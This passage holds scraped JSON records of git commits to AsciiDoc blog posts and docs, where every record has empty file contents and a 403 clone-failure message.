2017-02-07-docker-compose-best-practices-part-2.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_file":"_posts\/2017-02-07-docker-compose-best-practices-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34b6526f3808fcf1adbeb43d9325400d40ed51f3","subject":"Update 2011-08-07-Professional-Android-2-development-Error-in-Chapter-5.adoc","message":"Update 2011-08-07-Professional-Android-2-development-Error-in-Chapter-5.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2011-08-07-Professional-Android-2-development-Error-in-Chapter-5.adoc","new_file":"_posts\/2011-08-07-Professional-Android-2-development-Error-in-Chapter-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"573b86c23a7aa18a3a97b5ba8ec280abc98fff1a","subject":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","message":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b19f591bf5168ffa31f6642eca7bad049efcf32","subject":"add extension post","message":"add extension post\n","repos":"antoinesd\/antoinesd.github.io,antoinesd\/antoinesd.github.io","old_file":"2017-01-27-nobody-expects-the-cdi-portable-extensions.adoc","new_file":"2017-01-27-nobody-expects-the-cdi-portable-extensions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/antoinesd\/antoinesd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"108080714e7ff105e2d94c4eb6c48f1468f6d32d","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9ca3df3346ef9507db6085550556ef5f5d69ea2","subject":"Update 2016-03-16-Using-Source-Tree-to-Access-Git-Lab.adoc","message":"Update 
2016-03-16-Using-Source-Tree-to-Access-Git-Lab.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2016-03-16-Using-Source-Tree-to-Access-Git-Lab.adoc","new_file":"_posts\/2016-03-16-Using-Source-Tree-to-Access-Git-Lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8de8f29a365ce18808d63ba4df1ad751bb8f0a6","subject":"Update 2017-05-22-Release-asciidoctor-ant-154-et-plus.adoc","message":"Update 2017-05-22-Release-asciidoctor-ant-154-et-plus.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2017-05-22-Release-asciidoctor-ant-154-et-plus.adoc","new_file":"_posts\/2017-05-22-Release-asciidoctor-ant-154-et-plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a707994290e5d601985bf2f2ea6c822b6c0c330","subject":"Improvements and corrections to Impala CREATE TABLE examples","message":"Improvements and corrections to Impala CREATE TABLE examples\n\nChange-Id: I093972a7b806787a8c72634851796eebb5e1ae4c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3376\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"887ef9cc7fe31ea7ac0ad553124397957136a6b8","subject":"Update 2015-01-07-Um-cliente-mais-amigavel-para-o-Postgres.adoc","message":"Update 2015-01-07-Um-cliente-mais-amigavel-para-o-Postgres.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2015-01-07-Um-cliente-mais-amigavel-para-o-Postgres.adoc","new_file":"_posts\/2015-01-07-Um-cliente-mais-amigavel-para-o-Postgres.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c4b995860a26889f55cd9f46acdf874dc95233","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e68fa7f56c581287341ed9b6d2d7ede680b677aa","subject":"Update 2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","message":"Update 2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","new_file":"_posts\/2017-04-21-criando-novo-projeto-nativescript-com-angular-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e647a49151afd9bb140494afd65f6f0d82991da","subject":"Update 2015-09-16-When-Epiales-Calls.adoc","message":"Update 2015-09-16-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-16-When-Epiales-Calls.adoc","new_file":"_posts\/2015-09-16-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf05a1b4403da3e9582e0f03b0288a6d9949d693","subject":"Update 2017-02-04-Dies-ist-der-Titel.adoc","message":"Update 2017-02-04-Dies-ist-der-Titel.adoc","repos":"DaOesten\/hubpress.io,DaOesten\/hubpress.io,DaOesten\/hubpress.io,DaOesten\/hubpress.io","old_file":"_posts\/2017-02-04-Dies-ist-der-Titel.adoc","new_file":"_posts\/2017-02-04-Dies-ist-der-Titel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DaOesten\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"545c473bfff44fc7695d86b6c14fdc67082e8d95","subject":"create post The Invisible iPhone Button...","message":"create post The Invisible iPhone Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Invisible-iPhone-Button....adoc","new_file":"_posts\/2018-02-26-The-Invisible-iPhone-Button....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20de765b01c4e1577f0cc622f1201d9a443607ec","subject":"Update 
2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf0caf778286e3ed4095b997cce08949cd71a67","subject":"job: #12203 Fixed the fix and wrote the note. A follow-on issue has been raised to address a performance problem.","message":"job: #12203 Fixed the fix and wrote the note. A follow-on issue has been raised to address a performance problem.\n","repos":"travislondon\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12203_curly_braces_int.adoc","new_file":"doc-bridgepoint\/notes\/12203_curly_braces_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6077a58ffaae2510b87360307e186cf171d71078","subject":"y2b create post Twelve South BookArc Unboxing \\u0026 Overview","message":"y2b create post Twelve South BookArc Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-25-Twelve-South-BookArc-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-06-25-Twelve-South-BookArc-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52aad4ab8dd792fda5500a990e3782882d29659d","subject":"y2b create post Sony PS3 Wireless Keypad Unboxing \\u0026 Overview","message":"y2b create post Sony PS3 Wireless Keypad Unboxing \\u0026 
Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-01-Sony-PS3-Wireless-Keypad-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-10-01-Sony-PS3-Wireless-Keypad-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60b246fff40b734a201422ba9bd5b7480a8f46a4","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c04896659ce9f0006ab6e07b5a72488ee54ac2bc","subject":"y2b create post Casio G-Shock DW6900MS-1 Unboxing \\u0026 Overview","message":"y2b create post Casio G-Shock DW6900MS-1 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-10-Casio-GShock-DW6900MS1-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-10-Casio-GShock-DW6900MS1-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bf42537eec1b13016eae1257430bf5c8aa8003d","subject":"Renamed '_posts\/2019-01-31-java-language.adoc' to '_posts\/2019-01-31-object-oriented-programming-concepts.adoc'","message":"Renamed '_posts\/2019-01-31-java-language.adoc' to '_posts\/2019-01-31-object-oriented-programming-concepts.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-object-oriented-programming-concepts.adoc","new_file":"_posts\/2019-01-31-object-oriented-programming-concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"257d12d96ca2f2980312f64575381249ebded54e","subject":"Update 2016-01-13-Rails-5beta.adoc","message":"Update 2016-01-13-Rails-5beta.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2016-01-13-Rails-5beta.adoc","new_file":"_posts\/2016-01-13-Rails-5beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a9a06024db60a17076ad1b224635f3d0ed36c88","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","message":"Publish 
17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c951413151440291802411cd76d63c7dba6a8088","subject":"y2b create post Can you find the iPhone on this carpet?","message":"y2b create post Can you find the iPhone on this carpet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-17-Can-you-find-the-iPhone-on-this-carpet.adoc","new_file":"_posts\/2016-07-17-Can-you-find-the-iPhone-on-this-carpet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27c0c4a68bd8aa066497e2b04be2e3fde0efa7bc","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34b092e746fe26fd74cd657126e2b78c44aa6247","subject":"y2b create post Unboxing Every iPhone 6S \\\/ 6S Plus","message":"y2b create post Unboxing Every iPhone 6S \\\/ 6S Plus","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-25-Unboxing-Every-iPhone-6S--6S-Plus.adoc","new_file":"_posts\/2015-09-25-Unboxing-Every-iPhone-6S--6S-Plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f72e43a290dbe218f6c6dd172c5e4d36b804296","subject":"Update 2016-01-30-Puzzle-2-Hack-Me-If-You-Can.adoc","message":"Update 2016-01-30-Puzzle-2-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-30-Puzzle-2-Hack-Me-If-You-Can.adoc","new_file":"_posts\/2016-01-30-Puzzle-2-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"403c1cc0a2dddb1527b673217ec828ecd58dfd0b","subject":"Delete 
the file at '_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc'","message":"Delete the file at '_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c954efe068a3c6d19f54464b0c1f119e032a4ca7","subject":"last command fixed https:\/\/github.com\/docker\/labs\/issues\/350","message":"last command fixed https:\/\/github.com\/docker\/labs\/issues\/350\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9dc6128f9f4ac78afc4c1dfa7844ce612c56f58","subject":"y2b create post New Unboxing Videos!","message":"y2b create post New Unboxing Videos!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-30-New-Unboxing-Videos.adoc","new_file":"_posts\/2011-11-30-New-Unboxing-Videos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23e6d2877b43ae5d37c85f72dbddf4d16cd794c0","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a58fb5f3961c6f85e31479147deb5a04cb9622e","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"035aa235f43bf07a03dfe916d3084574067d5871","subject":"Update 2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","message":"Update 
2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c702ce01f8432e6b2bca2385ab36771401ddc6e","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3443a499b24fbb8769eb25a7f30093bf150c4304","subject":"Update 2017-08-17-Serverless-Framework-Type-Script-2.adoc","message":"Update 2017-08-17-Serverless-Framework-Type-Script-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-2.adoc","new_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45fc2eb019dccf5d6bf70b29c94ab50fc41134d5","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aeda1029460eb79b3cfd900a58124da8808dbae","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"328fabf59ca3a7661e52dc76e760be7cb498b759","subject":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","message":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"790883524a5bff2853a119751bd75c66dbb0dc49","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 